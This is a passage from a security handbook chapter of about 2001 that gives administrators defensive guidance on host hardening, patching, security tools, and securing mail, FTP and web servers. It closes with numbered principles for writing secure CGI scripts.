affect computers being used to offer information services and describes how to build servers that minimizes these problems. This chapter discusses general host security first, and then application security issues for mail servers, file servers, web servers, database servers, and name servers. Host Security Many organizations that run servers on the Internet simply do not secure their servers against external attack. People still pick easy-to-guess passwords, and many passwords are simply "sniffed" out of the Internet using a variety of readily available packet sniffers. Today there are literally thousands of organized and semi-organized groups of attackers--all exchanging information regarding computer vulnerabilities and exploits. Techniques, and in many cases complete programs for penetrating system security, are now widely distributed by e-mail, through newsgroups, on web pages, and over Internet Relay Chat (IRC). Tools for compromising security--password sniffers, denial-of-service exploits, and prepackaged Trojan horses--are distributed as well. Attackers now use automated tools to search out vulnerable computers and, in some cases, to automatically break in, plant back doors, and hide the damage. High-speed Internet connections have made it possible for attackers to rapidly scan and attack millions of computers within a very short period of time. The Honeynet Project (http://project.honeynet.org/) is an open Internet research project that is attempting to gauge the scale of the attacker community by setting up vulnerable computers on the Internet and seeing how long it takes before the computers are compromised. The results are not encouraging. In June 2001, for instance, the Honeynet Project announced that it took only 72 hours, on average, before somebody breaks into a newly installed Red Hat 6.2 system using one of the well-known exploits. A typical system on the Internet is scanned dozens of times a day. Windows 98 computers with file sharing enabled--a typical configuration for many home users--are scanned almost once an hour and typically broken into in less than a day. In one case, a server was hacked only 15 minutes after it was put on the network. It's tempting to approach host security as a checklist of do's and don'ts for computers and networks. After all, to damage a computer, an attacker must have access. So in theory, to operate a secure system, all you need to do is to block all of the venues by which an attacker can get access, and the resulting system will be secure. In practice, however, it has proved nearly impossible to have a computer that offers services over the network and yet still denies all access to attackers. Often access comes through unintended holes, such as a carelessly coded CGI script, or a buffer overflow attack that is known to the attacker but not the computer's operators. For more than a decade, there have been nine widespread practices on the Internet that make host security far worse than it needs to be. These practices are: · Failure to think about security as a fundamental aspect of system setup and design (establishing policy) · Purchase and configuration of computing systems based on issues of cost or compatibility rather than on the desired functionality and security needs Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 267 · Failure to obtain and maintain software that's free of all known bugs and security holes · Running unnecessary services · Transmitting of plaintext, reusable passwords over networks · Failure to track security developments and take preventative action · Failure to use security tools properly, if they are used at all · Lack of adequate auditing and logging (discussed in chapter 5-5) · Lack of adequate backup procedures (discussed in chapter 5-3) Security Through Policy Security is defined by policy. In some environments, every user is allowed to install or modify the organization's web pages. In others, only a few users are allowed to even read the pages. In some environments, any user can shut down or reboot the system. In others, it requires signed authorization from the CIO to so much as replace a file. Policy helps users understand what is allowed. Policy guides administrators and managers in making choices about system configuration and use. Policy helps designers create systems that realize the organization's goals. The most basic security policy is a clear statement of what actions are allowed and disallowed, and by whom. Standards and guidelines should include the answers to these questions: · Who is allowed access, what is the nature of that access, and who authorizes such access? · Who is responsible for security, for upgrades, for backups, and for maintenance? · What kinds of information may be served? · Which sites and external users are to be allowed access to data served? · What kinds of testing and evaluation must be performed on software and pages before they are installed? · How will complaints and requests about the server and content be handled? · How should the organization react to security incidents? · Who is allowed to speak to members of the press, law enforcement, and other entities outside the organization in the event of questions or an incident? · How and when should the policy itself be updated? Your policy documents should be written and made available to everyone associated with your organization. Care given to the development of the policy can head off lots of potential problems. One often-overlooked policy issue is how to dispose of storage devices. The hard drives of your servers, your old backup tapes, and even your user workstations, may contain valuable and private data. In addition to protecting them from compromise while they are in operation, be sure you have a policy that provides for their sanitization or thorough destruction when they go out of operation. Sanitizing hard drives, for example, is surprisingly difficult. Choosing Your Vendor Today there are many choices for organizations setting up information servers. Should your computer run Windows, Mac OS, Unix, or a "free" Unix-like operating system? Should your computer system use an Intel-compatible microprocessor, or a SPARC, PowerPC, or another processor? Should you purchase the computer with or without PART support? What level of support is appropriate? FIVE Many purchase decisions are based on factors such as the cost of the system, the reputation of the vendor, and the experience of the person making the purchase. Few organizations base their purchase decisions on the security of the underlying system. 268 IT SECURITY FOR TECHNICAL ADMINISTRATORS Some vendors and platforms have better security pedigrees than the others, because different manufacturers value code quality and security differently. But the size of the user base also affects the security that a system will provide--even relatively secure systems can become "unsecure" in the face of a large number of well-funded adversaries who widely publicize their findings. One of the biggest threats to the security of your system is the presence of software faults or bugs. These can cause your system to crash, corrupt your information, or, worst of all, allow outsiders unauthorized access. It is stunning to see how many organizations are willing to operate mission-critical systems on "beta" or "pre-beta" software releases. As a large number of web sites are based on Windows NT running on Intel-compatible microprocessors, there is an incredibly high incentive for attackers to find vulnerabilities with this configuration.228 For this reason, some organizations have decided to deploy uncommon configurations--such as OpenBSD running on Solaris SPARC computers--simply because fewer attackers have experience with these systems. For example, if security is your primary concern in running a web server, consider running your web server on a Macintosh computer running the OS 7, OS 8, or OS 9 operating systems. Because these versions of the Macintosh operating system were not delivered with a command-line interpreter, it is extremely difficult for attackers to break into the system and run programs of their own choosing. They also don't come with dozens of network services enabled that can be compromised. And Apple has a very good history of providing carefully written, apparently bug-free code. While the underlying operating system is important, equally important are the applications and the customized software that are layered on top of this base. A secure underlying system can be made vulnerable by a single vulnerable script that was written by a consultant to provide additional functionality. Some steps that you should follow before specifying and deploying a new system include: · Determine which vendors have the best reputation for producing bug-free, well-documented software. Find out what specific measures your vendors use to assure high security--such as the security criteria that they employ, data flow analysis, code audits, and/or penetration testing. Ask the vendors for copies of their metrics and test evaluations from reviews. You might also check the historical trends associated with the discovery and reporting of security flaws in software by that vendor. One source may be found at http://www.securityfocus.com/vdb/stats.html. (Because of the evolution in generally accepted methods of flaw discovery and reporting, we suggest that you don't use figures before 1997 or so in your evaluation, as they may not be reliable.) · Investigate how your proposed vendors respond to reports of security or performance-relevant faults in their products. Is your proposed vendor timely and open in dealing with problems? Some vendors have a history of ignoring users unless there is significant bad press from complaints or incidents. These vendors should be avoided. · Explore the importance your vendor attributes to good design, with issues of security, safety, and user interfaces. Systems resistant to attacks and user mistakes are much better to use in situations where you need dependable operation. · Determine whether your organization would be better off using "old-generation" software for which the problems are presumably well-known, or "leading-edge" software that offers new features. · Choose the system with the least number of features that does what you want well. Hardware is relatively inexpensive: buying a system to devote to a reduced configuration for a web server (for example) may be a better purchase than a clone of one of your standard systems that results in a massive break-in. Here are some things to request or require when shopping for software and systems: 228There are other reasons why Microsoft products seem to be a favorite of attackers. These include the large numbers of vulnerabilities that keep being discovered, the complexity of the software which makes the software difficult for administrators to secure, and the simple fact that Microsoft is disliked by many people. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 269 · Proof that good software engineering practices were followed in the design, coding, and testing of the software. · Documentation showing the results of testing the software and system in environments similar to yours. Ideally, testing should include both operational testing and stress testing. · A written statement of the vendor's policy for accepting, documenting, and responding to reports of faults in the product. · A written statement of how the vendor notifies customers of newly fixed security flaws. (The most responsible vendors release notices through FIRST teams and through customer mailing lists; the least responsible vendors never announce fixes, or bury them in lists of other bug fixes in obscure locations.) · Examples of previous notifications and bug fixes. Although the computer industry is beginning to take computer security seriously, no software vendor will warrant its products against losses related to unsecured code--not even the vendors of security products. A few insurance companies are now issuing policies to cover losses from break-ins and defacements of web sites. You should investigate these policies to see if there are different rates for different systems. As time goes on, rates should adjust to reflect the configurations that present less risk (and thus warrant smaller premiums).229 Obtaining and Maintaining Software Once you have decided upon a vendor, hardware platform, and software, you need to install everything. Installation is an extremely important process. Frequently, mistakes made during installation can come back to haunt you after you have brought your system online and gone on to other projects. So take your time and be certain of what you are doing. Conducting an inventory Inventory all of your systems. Write down the serial numbers, the amount of RAM, the kinds of processors, option cards, and other hardware configuration options. Make sure that you have copies of this information in at least two locations--one easy way to do so is to type the information into a spreadsheet and e-mail a copy to yourself at home. This information will be useful for diagnosing performance issues. If you suffer a theft or loss, it will be useful for insurance purposes, too. You should also inventory your software. For each product, note the vendor, the distribution, and the release. If you have software that comes with activation codes, it may be useful to record these as well. However, if you record the activation codes, you should attempt to secure them, because the distribution of activation codes could be considered software piracy by some vendors. Be sure that you save all of the original packing material, documentation, blow-in inserts, and other information that comes with your computers and software. This can be critical if you are returning the equipment or need to relocate it. It is also surprising how many companies put vital information on seemingly innocuous printouts. Frequently, last minute inserts can be security or safety warnings, so be sure to at least glance at every piece of paper that you receive with your hardware and software. PART Installing software and patches FIVE Before you start to install the software for your computer, check the web site of each vendor to make sure you have all of the security patches and bug fixes for the version of the software that you intend to install. It is a good idea to read the release notes for both the base operating system and the patches. Some vendors distribute patches 229As of late 2001, at least one insurance company charges higher premiums to customers using Windows and/or IIS as platforms. 270 IT SECURITY FOR TECHNICAL ADMINISTRATORS that must be installed in a particular order--installing the patches out of order can sometimes result in security vulnerabilities being reintroduced! If at all possible, you should disconnect your computer from the Internet at the start of the installation procedure and not connect it until you are finished. There are many recorded cases of computers connected to the Internet being compromised between the time that the computer's base operating system was installed and the time that the patches were going to be installed. Unfortunately, it is increasingly difficult to install updates and register without software being connected to the Internet. Once you have made sure that your computer is not connected to the Internet, install the computer's base operating system, any operating system patches, then the application programs and the application patches. Keep a notebook and record every specific action that you take. Such a log can be immensely useful if you are going to be installing several computers and hope to delegate the activity to others. At this point, before any further work is done, you should make a complete backup of the computer system. This backup will be invaluable if your computer is compromised by an attacker or a hardware failure. After your first backup is finished, you can make any local customizations that are required. You should then make a second backup of your computer system onto a different tape, CD, or disk. Finally, make sure that all of the distribution software and the backups are stored in a place that is safe and will not be forgotten. Make sure that physical access to the computer is restricted. You may also wish to remove the floppy disk drive or CDs to make it more difficult for a person who has physical access for a brief period of time to compromise your server. Minimizing Risk by Minimizing Services An important way to minimize the threats to your server is by minimizing the other services that are offered by the computer on which the server is running. If you don't need a service, disable it. By eliminating all non-essential services, you eliminate potential avenues through which an attacker could break into your system. One implication of this principle is that, when possible, you should separate services onto different computers: DNS servers, mail servers, web servers, file servers, etc. Some services, such as finger, netstat, systat, and rwho, should be routinely disabled because they provide sensitive information to outsiders. Others, like chargen and echo can be used for denial of service attacks. Network services that transmit reusable unencrypted passwords, like telnet and (non-anonymous) FTP, or that authenticate users by IP address, like rlogin and rsh, should be disabled in favor of secure alternatives, like ssh or one-time password systems. On a Unix server, you can easily restrict unneeded services by commenting out appropriate lines in inetd.conf. Another small handful of services that run as standalone daemons (portmapper is an example) can be eliminated in the "rc" files, found in the files /etc/rc and /etc/rc.local, and the subdirectories below /etc/rc.d, /etc/init.d, and /usr/local/etc/rc.d. You can also use TCP wrappers and host-based firewalls to control access to services, as described in chapter 5-6. Disabling IP services with an NT or Windows 2000 system is a little trickier, because settings are sprinkled throughout the registry, and some services have to be functioning for the sake of NT. Many NT services can be audited and disabled using the Services control panel. The good news is that NT servers come with built-in access list capability. You can use this to prohibit all traffic to certain ports, and thereby achieve the same results as you would by shutting down services. (You can set IP filtering under the Control Panel's advanced TCP/IP settings.) Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 271 Another variation on minimizing services is minimizing privileges. Servers that don't have to run as the superuser or Administrator shouldn't; those that must should give up superuser privileges as soon as possible if they can. In many cases, each different kind of server process should run with its own uid and group. Servers that can be restricted to a small area of the filesystem (using the chroot() or jail() system calls) should be. Keeping Abreast of New Vulnerabilities In today's environment, you must stay abreast of newly discovered vulnerabilities if you wish to maintain a secure computer that is connected to the Internet. Vulnerabilities are usually publicized with breathtaking speed once they are discovered. What's more, once a vulnerability is known, exploits are quickly developed and distributed across the Internet. In many cases, system administrators only have a few hours between the time that a vulnerability is first publicized and the time when they will start to be attacked with it. Monitor bulletins issued by your vendors and that install security-related patches as soon as they are made available. Most vendors have mailing lists that are specifically for security-related information. Another source of information are FIRST230 teams such as the CERT/CC (Computer Emergency Response Team, Coordination Center) at the Software Engineering Institute. The CERT/CC collects reports of computer crime, provides the information to vendors, and distributes information from vendors regarding vulnerabilities of their systems. Because CERT/CC and many other response teams do not make information available in a timely fashion, however, don't depend on them as your primary information source. As a backup, you might also subscribe to one or two of the security-related mailing lists, such as nt-security, bugtraq, and firewalls. Using Security Tools A security tool is a special program that you can run to evaluate or enhance the security of your site. Many security tools that are available today were developed at universities or by independent specialists and are freely distributed over the Internet. There are also several good tools that are marketed commercially. There are five kinds of tools that you should consider using: · Tools that scan your system for potential weaknesses that a local user could exploit · Tools that monitor your system over time, looking for unauthorized changes (see Chapter 5, Auditing and Forensics for complete discussion) · Tools that scan your network, looking for network-based weaknesses · Tools that monitor your system and network to identify attacks in progress · Tools that record all network activity for later analysis Automated tools are (usually) a low-cost, highly effective way to monitor and improve your system's security. Some of these tools are also routinely employed by attackers to find weaknesses in sites around the Internet. Therefore, it behooves you to obtain your own tools and use them on a regular basis. Snapshot tools PART A snapshot or static audit tool will scan your system for weaknesses and report them to you. For example, on your FIVE Unix system a tool might look at the /etc/passwd file to ensure that it is not writeable by anyone other than the superuser. Snapshot tools perform many (perhaps hundreds) of checks in a short amount of time. 230Forum of Incident Response and Security Teams, the worldwide consortium of major computer incident response groups. Visit http://www.first.org for more information. 272 IT SECURITY FOR TECHNICAL ADMINISTRATORS An up-to-date Unix snapshot tool is Tiger, from Texas A&M University. Tiger runs on a wider variety of operating systems and is easy to install. Several packages are available in the Windows world. The Kane Security Analyst (KSA) from Intrusion Detection, Inc. (http://www.intrusion.com/) will check passwords and permissions (ACL), and monitor data integrity. NAT is a free tool for assessing NetBIOS and NT password security made available by Security Advisors (http:// www.secnet.com). Two tools for checking NT passwords are ScanNT, written by Andy Baron (http://www.ntsecurity.com/Products/ScanNT/index.htm), and L0pht Crack, by the "computer security researchers" at L0pht Heavy Industries (now part of @Stake). A snapshot program should be run on a regular basis--no less than once a month and probably at least once a week. Carefully evaluate the output of these programs, and follow up if possible. Don't leave the output from a snapshot security tool in a place that is accessible to others: by definition, the holes that they can find can easily be exploited by attackers. Network scanning programs These tools check for well-known security-related bugs in network programs such as sendmail and ftpd. Your computers are certainly being scanned by crackers interested in breaking into your systems, so you might as well run these programs yourselves. Among the most powerful freely available tools for Unix operating systems is Nessus (http://www.nessus.org). SomarSoft (http://www.somarsoft.com) offers several tools for analyzing information culled from Windows NT logs and databases. KSA, mentioned above, also provides analysis and integrity checking for NT environments. Another powerful scanning program is nmap (http://www.insecure.org/nmap), which scans for open network ports, can map networks, and can often identify the operating system of a computer by its responses to network scans. Intrusion detection systems Intrusion detection system (IDS) programs are the operating system equivalent of burglar alarms. As their name implies, these tools scan a computer as it runs, watching for the tell-tale signs of a break-in. Intrusion detection systems can either be host-based or network-based. A host-based system looks for intrusions on that particular host. Most of these programs rely on secure auditing systems built into the operating system. Network-based systems monitor a network for the tell-tale signs of a break-in on another computer. Most of these systems are essentially sophisticated network monitoring systems that use Ethernet interfaces as packet sniffers. An example of a sophisticated free network IDS is Snort (http://www.snort.org). Virus scanners There is a huge market for antivirus tools in the Windows environment. When choosing antivirus software, consider not only the product's features, but what kind of support it provides for updating the list of viruses that it can recognize. Many commercial virus scanners use a subscription model, in which you can download weekly updates to the virus engine as long as you maintain a subscription. Antivirus tools are not needed for Unix or Linux systems--there are only three or four reported viruses for these platforms, and they do not spread well. An integrity monitor (such as Tripwire) will also perform any antivirus function needed on these platforms as a side-effect of the way it works. Similarly, older Mac OS systems primarily need antivirus tools to combat macro viruses in Microsoft Office products. On the other hand, a Unix-based mail server can serve as an antivirus gateway to protect Windows mail clients. Several antivirus engines detect Windows viruses but run on Unix machines for just this purpose. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 273 Network recording and logging tools Network recording and logging tools record all of the traffic that passes over a network, preserving it for retrospective analysis. These systems are typically run on computers with large disks. (An 80-gigabyte hard disk, for example, can store nearly two weeks of typical traffic sent over a T1 line.) In the event of a break-in or other incident, the recorded traffic can be analyzed. Securing Mail Servers Mail servers are often the most important servers in any organization. When mail servers are down, a major communication link between the organization's clients, vendors, and employees is severed. When mail servers are compromised, private and confidential information is quickly exposed. Although the usual host security measures apply to mail servers, several special considerations arise. Choosing a Mail Transport Agent The mail transport agent (MTA) is the software that is responsible for receiving and relaying e-mail. At one end, it communicates with mail user agents that connect to the transport agent to send e-mail. At the other, it communicates with mail delivery agents that perform the final delivery of e-mail to its destination. An MTA must be properly configured so that it will accept mail to and from the proper users and no others. For Unix-based mail servers, the leading MTAs include sendmail, postfix, qmail, and exim. Sendmail is the oldest, best known, and most widely used MTA; it also has the worst security record, in large part because it was designed at a time when the Internet was young and performance was more important than security. Postfix, qmail, and exim, on the other hand, were designed from the start with security in mind. If you make one security-related decision for your mail servers, it should be to run something other than sendmail; if you must run sendmail, read its extensive documentation carefully, as well as the O'Reilly and Associates Sendmail book, and be paranoid about configuration. Both postfix and exim can replace an existing sendmail-based system fairly painlessly. Windows-based mail servers may use such MTAs as Imail or Microsoft Exchange Server. Historically, Windows MTAs have not done a good job of complying with Internet standards, and have only a mediocre security record. Spam Unsolicited commercial e-mail (commonly referred to as "spam") has become a pervasive and costly problem. When providing e-mail services, it is imperative to insure that neither outsiders nor authorized users can use your systems to send spam. Controlling access by outsiders is relatively easy if you use current versions of your MTA software. All major MTAs now come with default configurations that will cause them to refuse to relay e-mail unless it's destined for a local user or sent by a trusted machine. A "trusted machine" usually means a machine with a given IP address (which is only trustworthy when the machine is inside the perimeter of a firewall that prevents IP spoofing), but can also PART mean a machine that can authenticate itself to the server cryptographically. FIVE Cryptographic authentication is often used by mail clients on laptops or other machines that receive their IP addresses dynamically. One widely-used approach is the SMTP AUTH protocol, an extension of SMTP that provides for 274 IT SECURITY FOR TECHNICAL ADMINISTRATORS authentication using one of the mechanisms in the Simple Authentication and Security Layer described in RFC2222. Another is to issue TLS client certificates to clients and use the STARTTLS extension to authenticate them.231 Insiders who send spam can inundate your organization's network bandwidth and can quickly damage your reputation or even leave you open to legal action.232 A key control on spam by insiders is to insure that they can only send outgoing mail through mail servers that you control and monitor. An effective way to do this is to block outgoing connections to TCP port 25 (the SMTP service's port) at your firewall, and then only allow your mail servers to make such connections. Confidentiality and Integrity Most MTAs can be configured to allow (or require) TLS-encrypted connections. The SMTP protocol has been extended to include a STARTTLS operation that initiates a TLS handshake in the SMTP dialogue. Using TLS is highly recommended, as it protects both the confidentiality and integrity of the messages "on the wire", as well as offering additional assurance that the client is connecting to the authentic SMTP server it expects. Similarly, if you provide POP or IMAP mailbox service to your users, most current POP/IMAP clients can make SSL/TLS encrypted connections to your POP/IMAP server, if you configure it to accept (or require) them. Because these protocols, by default, transmit passwords without encryption, requiring SSL/TLS connections provides significant protection for the user as well as their messages.233 Another alternative to unencrypted POP/IMAP service is to provide users with access to their e-mail through their web browser by using a "webmail" system. A major advantage of webmail is that the web server can be secured by SSL/TLS, and all web browsers are capable of taking advantage of the secure connection. Securing Anonymous FTP Servers The FTP protocol presents several problems to system administrators ­ so many, in fact, that the best practice today is not to run an FTP server at all. Instead, allow outsiders to download files through a web server, and require insiders to transfer files using scp or sftp (part of the ssh suite) or SSL-secured Web-DAV. If you must run an anonymous FTP server to permit outsiders to download or upload files, follow these guidelines: · Carefully read your FTP server's documentation for how to properly set up the anonymous file area so that anonymous users can only download from directories you specify and cannot delete files, rename files, or modify directory structures. · Avoid providing convenience executables like compression or archive programs that might have exploitable vulnerabilities. On Unix systems, if your FTP server provides its own directory display functionality, don't even provide an ls executable. · If your FTP server uses a password file to associate the uids of file owners with their login names, don't use your server's actual password file. Instead, make a dummy file that lists only the information you must (or don't use a file at all and let clients see uids). · If you allow file uploads, allow them in separate directories from the download directories, and be sure that users cannot download the uploaded files. This prevents your FTP site from being used to traffic in illegal software or other files. You should also insure that uploaded files cannot have special characters in their filenames and that the upload area is on a separate disk partition to prevent a denial of service attack through overflowing the disk. 231Another popular, if less inherently secure, approach is POP-before-SMTP. In this approach, clients must first check their e-mail via POP, which records their IP address. The SMTP server then allows relaying from the recorded IP addresses for a limited time. This approach can be convenient, but is less secure unless the POP connection is itself encrypted. 232In fact, the huge amount of spam that originates from countries with ineffective legal remedies has significantly damaged the reputation of entire nations to the degree that many mail administrators routinely refuse any e-mail originating from these countries. 233Both POP and IMAP do support authentication mechanisms that don't transmit unencrypted passwords on the network, but most of these are more tedious to enable than SSL/TLS, and don't provide the privacy or integrity protection of message encryption. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 275 Don't provide non-anonymous FTP service at all unless you can protect it with a VPN tunnel or a cryptographic wrapper like SafeTP (http://safetp.cs.berkeley.edu). Securing Web Servers When it comes to serving web pages, the general rules of server security apply. Choose an operating system and a web server application with a good security philosophy and a good security record. Carefully read the web server's documentation, particularly around security issues. Disable any guest logins and limit the number of users with accounts on the web server to those who require them. Disable administrative logins from the network. On a Windows system, if you must administer the server remotely, change the name of the "Administrator" account to something more difficult to guess. On a Unix system, disable root logins and require users to use the su program for administration. There are, however, several security issues specific to running web servers. Most notable are data confidentiality, server-side scripting and content updating. Data Confidentiality If you will be transmitting sensitive information, get an SSL certificate and use an SSL-enabled web server (both Apache and IIS can be configured to use SSL). If you're designing an intranet application (or an Internet application that's restricted to your clients or employees), you can use a self-signed SSL certificate or set up your own certificate authority. Otherwise, you'll probably need to invest in SSL certificates from a well known certificate authority like VeriSign, whose signing certificate is bundled with major web browsers. See chapter 5-4 for more information about SSL certificates. If you don't use SSL, the entire HTTP transaction occurs unencrypted, including the usernames and passwords used in "basic" HTTP authentication and any form fields that the client transmits. In most cases, if you plan to authenticate the user you should implement SSL to protect the transaction. Server-Side Scripting Web servers are fine programs for displaying static information such as brochures, FAQs, and product catalogs. But applications that are customized for the user or that implement business logic (such as shopping carts) require that servers be extended with specialized code that executes each time the web page is fetched. This code most often takes the form of scripts or programs that are run when a particular URL is accessed. There is no limit to what a good programming team can do with a web server, a programming language, and enough time. Unfortunately, programs that provide additional functionality over the Web can have flaws that allow attackers to compromise the system on which the web server is running. These flaws are rarely evident when the program is run as intended. There are four primary techniques that web developers can use to create web-based applications: CGI PART The Common Gateway Interface (CGI) was the first means of extending web servers. When a URL referencing a CGI program is requested from the web server, the web server runs the CGI program in a separate process, captures the FIVE program's output, and sends the results to the requesting web browser. Parameters to the CGI programs are encoded as environment variables and also provided to the program on standard input. CGI programs can perform database queries and display the results, allow people to perform complex financial calculations, and allow web users to "chat" with others on the Internet. Indeed, practically every innovative use of 276 IT SECURITY FOR TECHNICAL ADMINISTRATORS the World Wide Web, from web search engines to web pages that let you track the status of overnight packages, was originally written using the CGI interface. Plug-ins, loadable modules, and Application Programmer Interfaces (APIs) The second technique developed to extend web servers involved modifying the web server with extension modules, usually written in C or C++. The extension module was then loaded into the web server at runtime. Plug-ins, modules, and APIs are a faster way to interface custom programs to web servers because they do not require that a new process be started for each web interaction. Instead, the web server process itself runs application code within its own address space that is invoked through a documented interface. But these techniques have a distinct disadvantage: the plug-in code can be very difficult to write, and a single bug can cause the entire web server to crash. Embedded scripting languages Web-based scripting languages were the third technique developed for adding programmatic functionality to web pages. These systems allow developers to place small programs, usually called scripts, directly into the web page. An interpreter embedded in the web server runs the program contained on the web page before the resulting code is sent to the web browser. Embedded scripts tend to be quite fast. Microsoft's ASP, PHP, server-side JavaScript, and mod_perl are all examples of embedded scripting languages. Embedded web server Finally, some systems do away with the web server completely and embed their own HTTP server into the web application itself. Largely as a result of their power, the extension techniques enumerated here can completely compromise the security of your web server and the host on which it is running. That's because potentially any program can be run through these interfaces. This includes programs that have security problems, programs that give outsiders access to your computer, and even programs that change or erase critical files on your system. Two techniques can limit the damage that can be caused by web applications: · The programs themselves should be designed and inspected to ensure that they can perform only the desired functions. · The programs should be run in a restricted environment. If these programs can be subverted by an attacker to do something unexpected, the damage that they could do will be limited. On operating systems that allow for multiple users running at multiple authorization levels, web servers are normally run under a restricted account, usually the nobody or the httpd user. Programs that are spawned from the web server through either CGI or API interfaces are then run as the same restricted user.234 Unfortunately, other operating systems do not have the same notion of restricted users. On Windows 3.1, Windows 95/98/ME, and the Mac OS 7­9 operating systems prior to Mac OS X, there is no easy way for the operating system to restrict the reach of a CGI program. Programs That Should Not Be CGIs Interpreters, shells, scripting engines, and other extensible programs should never appear in a CGI scripting directory (e.g. cgi-bin), nor should they be located elsewhere on a computer where they might be invoked by a request to the web server process. Programs that are installed in this way allow attackers to run any program they wish on your computer. 234In a multiuser environment, such as a web server at an ISP or a university, it is common practice to use the cgiwrap script so that CGI programs are run with the author's permissions, rather than with the web server's. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 277 For example, on Windows-based systems the Perl executable PERL.EXE should never appear in the CGI script directory. It is easy to probe a computer to see if it has been improperly configured. To make matters worse, some search engines can be used to find vulnerable machines automatically. Unfortunately, many Windows-based web servers have been configured this way because it makes it easier to set up Perl scripts on these servers. Another source of concern are programs or scripts that are distributed with web servers and later found to have security flaws. Because webmasters rarely delete programs that are part of the default installation--it can be quite difficult to find out if a script is in use or not--these dangerous programs and scripts may persist for months or even years, even if new versions of the web server are installed that do not contain the bug. To protect yourself from programs, scripts, and CGIs in which security faults may be later discovered, move all of the programs that are installed by default with your web sever into a directory where they cannot be accessed, and only restore the programs when they are specifically needed. Unintended Side Effects Security problems in scripts can remain dormant for years before they are exploited. Sometimes, obscure security holes may even be inserted by the programmer who first wrote the scripts--a sort of "back door" that allows the programmer to gain access in the future, should the programmer's legitimate means of access be lost. In other cases, the security hole is the result of an unintended side effect of the script. Unintended side effects can often be prevented by distrusting any input that comes from outside of the program ­ from a user's entries in a web form, from environment variables, from cookies, or anywhere else. Any outside input should be filtered to extract only legal characters, and then checked to insure that it is sensible. It's important to design filters that filter in a list of acceptable characters and reject all others, rather than rejecting a list of bad characters and accepting all others. The former approach is much more secure, as it can be difficult to anticipate all of the possible bad characters (and some characters that aren't bad now may one day become so!) For example, many older applications did not anticipate the possible of Unicode characters. See chapter 16 of Garfinkel's Web Security, Privacy, and Commerce, 2nd Edition for more examples of unintended side effects. General Principles for Writing Secure Scripts The principles below represent the current best practices for writing shell scripts: 1. Carefully design the program before you start. Be certain that you understand what you are trying to build. Carefully consider the environment in which it will run, the input and output behavior, files used, arguments recognized, signals caught, and other aspects of behavior. List all of the errors that might occur, and how your program will deal with them. Write a code specification in English (or your native language) before writing the code in the computer language of your choice. 2. Show the specification to another person. Before you start writing code, show the specification that you have written to another programmer. Make sure they can understand the specification and that they think it will work. PART If you can't convince another programmer that your paper design will work, you should go back to the design phase and make your specification clearer. The time you spend now will be repaid many times over in the future. FIVE 3. Choose a scripting language that provides safety features for CGI scripting and that prevents buffer overflow errors. Perl, python, and Ruby are good choices. C and C++ are generally a poor choice. Never write CGI scripts for a shell interpreter like /bin/sh. 4. Whenever possible, reuse code. Don't write your own CGI library when you can use one that's already been debugged. But beware of reusing code that contains Trojan horses. 278 IT SECURITY FOR TECHNICAL ADMINISTRATORS 5. Write and test small sections at a time. As you start to write your program, start small and test frequently. When you test your sections, test them with both expected data and unexpected data. Where practical, functions should validate their arguments and perform reasonable actions (such as exiting with an error message or returning an error code) when presented with unreasonable data. A large number of security-related programs are simply bugs that have exploitable consequences. By writing code that is more reliable, you will also be writing code that is more secure. 6. Check all values provided by the user. An astonishing number of security-related bugs arise because an attacker sends an unexpected value or an unanticipated format to a program or a function within a program. A simple way to avoid these types of problems is by having your scripts always check and validate all of their arguments. Argument checking will not noticeably slow your scripts, but it will make them less susceptible to hostile users. As an added benefit, argument checking and error reporting will make the process of catching nonsecurity- related bugs easier. 7. Check arguments that you pass to operating system functions. Even though your program is calling the system function, you should check the arguments to be sure that they are what you expect them to be. For example, if you think that your program is opening a file in the current directory, you might want to use the index() function in C or Perl to see if the filename contains a slash character (/). If the file contains a slash, and it shouldn't, the program shouldn't open the file. 8. Check all return codes from system calls. The POSIX programming specification (which is followed by both C and Perl) requires that every system call provide a return code. Even system calls that you think cannot fail, such as write(), chdir(), or chown() can fail under exceptional circumstances and return appropriate return codes. When a call fails, check the errno variable to determine why it failed. Have your program log the unexpected value and then cleanly terminate if the system call fails for any unexpected reason. This approach will be a great help in tracking down both programming bugs and security problems later on. 9. Have internal consistency-checking code. If you think that a variable inside your program can only have the values 1, 2, or 3, check to ensure that it does, and generate an error condition if it does not. (You can do this easily using the assert macro if you are programming in C.) 10. Include lots of logging. You are usually better off having too much logging rather than too little. Rather than simply writing the results to standard error, and relying on your web server's log file, report your log information to a dedicated log file. It will make it easier for you to find the problems. Alternatively, consider using the syslog facility (under Unix), so that logs can be redirected to users or files, piped to programs, and/or sent to other machines. 11. Make the critical portion of your program as small and as simple as possible. 12. Always use full pathnames for any filename argument, for both commands and data files. Rather than depending on the current directory, set it yourself. 13. Be aware of race conditions. These can be manifest as a deadlock or as failure of two calls to execute in close sequence: Deadlock conditions Remember that more than one copy of your program may be running at the same time. Use file locking for any files that you modify. Provide a way to recover the locks in the event that the program crashes while a lock is held. Avoid deadlocks or "deadly embraces," which can occur when one program attempts to lock file A and then file B, while another program already holds a lock for file B and then attempts to lock file A. Sequence conditions Be aware that your program does not execute atomically. That is, the program can be interrupted between any two operations to let another program run for a while--including one that is trying to abuse yours. Thus, check your code carefully for any pair of operations that might fail if arbitrary code is executed between them. In particular, when you are performing a series of operations on a file such as changing its owner, stating the file, or changing its mode, first open the file and then use the fchown(), fstat(), or fchmod() system calls. Doing so will prevent the file from being replaced while your program is running (a possible race condition). Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 279 Also avoid the use of the access() function to determine your ability to access a file: using the access() function followed by an open() is a race condition, and almost always a bug. 14. Don't have your program dump core except during your testing. Core files can fill up a filesystem. Core files can contain confidential information. In some cases, an attacker can actually use the fact that a program dumps core to break into a system. Instead of dumping core, have your program log the appropriate problem and exit. Use the setrlimit() function to limit the size of the core file to 0. 15. Do not create files in world-writable directories. If your script needs to run as the nobody user, then have the directory in which it needs to create files owned by the nobody user. Give each script, or at the very least each subsystem, its own namespace for temporary files. (You can do this by giving each script its own directory for temporary files, or else by having each script prepend its temporary files with its own name.) Do not store temporary files in the /tmp directory if the web server is also used as a general host for Unix shell activities. 16. Don't 